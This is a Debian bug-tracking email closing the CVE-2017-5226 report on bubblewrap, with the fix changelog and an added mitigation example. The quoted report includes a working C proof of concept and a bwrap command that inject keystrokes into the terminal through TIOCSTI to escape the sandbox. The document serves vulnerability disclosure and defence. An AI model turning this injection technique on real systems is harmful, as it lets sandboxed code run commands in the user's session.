Your message dated Mon, 09 Jan 2017 18:33:21 +0000
with message-id <e1cqekz-0007t5...@fasolo.debian.org>
and subject line Bug#850702: fixed in bubblewrap 0.1.5-2
has caused the Debian Bug report #850702,
regarding CVE-2017-5226 -- bubblewrap escape
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
850702: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: bubblewrap
Version: All
Severity: grave

Hi,

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

Thanks,
Federico Bento.


--- End Message ---
--- Begin Message ---
Source: bubblewrap
Source-Version: 0.1.5-2

We believe that the bug you reported is fixed in the latest version of
bubblewrap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 850...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Simon McVittie <s...@debian.org> (supplier of updated bubblewrap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 09 Jan 2017 18:09:54 +0000
Source: bubblewrap
Binary: bubblewrap
Architecture: source
Version: 0.1.5-2
Distribution: unstable
Urgency: high
Maintainer: Utopia Maintenance Team <pkg-utopia-maintain...@lists.alioth.debian.org>
Changed-By: Simon McVittie <s...@debian.org>
Description:
 bubblewrap - setuid wrapper for unprivileged chroot and namespace manipulation
Closes: 850702
Changes:
 bubblewrap (0.1.5-2) unstable; urgency=high
 .
   * d/p/Call-setsid-before-executing-sandboxed-code-CVE-2017-5226.patch:
     Call setsid() before executing sandboxed code, preventing a
     sandboxed executable invoked with a controlling terminal (for
     example in Flatpak) from escalating its privileges by injecting
     keypresses into the controlling terminal with the TIOCSTI
     ioctl. (Closes: #850702; CVE-2017-5226)
   * d/control: remove Maintainer status from Laszlo Boszormenyi at his
     request. Add him to Uploaders instead, and hand the package over
     to the Utopia Maintenance Team (the same as OSTree and Flatpak).

-----BEGIN PGP SIGNATURE-----

-----END PGP SIGNATURE-----

--- End Message ---
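
The mitigation named in the changelog above, as an added example (not bubblewrap's code and not part of the original messages): a launcher that calls setsid() in the child before exec and refuses to run the program if the child can still open a controlling terminal. On Linux, TIOCSTI from a process without CAP_SYS_ADMIN is only permitted on that process's own controlling terminal, so a session with no controlling terminal cannot push input into the parent's tty. The names launch_in_new_session() and session_is_detached() are hypothetical.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if this process leads its own session and has no controlling tty. */
static int session_is_detached(void)
{
    int fd;

    if (getsid(0) != getpid())
        return 0;                      /* still in the caller's session */
    fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd >= 0) {                     /* /dev/tty opens only with a controlling tty */
        close(fd);
        return 0;
    }
    return 1;
}

/* Hypothetical launcher: fork, detach with setsid(), verify, then exec argv.
 * Returns the child's exit status, 126 if detaching failed, 127 if exec
 * failed, or -1 on fork/wait errors. */
int launch_in_new_session(char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* The forked child is never a process group leader, so setsid() can succeed. */
        if (setsid() == (pid_t)-1 || !session_is_detached())
            _exit(126);                /* fail closed: do not run the payload */
        execvp(argv[0], argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv[] = { "sh", "-c", "exit 0", NULL };  /* constructed sample command */
    int rc = launch_in_new_session(argv);
    printf("child exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```
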
